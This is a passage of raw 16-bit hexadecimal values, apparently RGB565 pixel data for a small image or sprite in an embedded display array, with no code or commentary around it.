0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
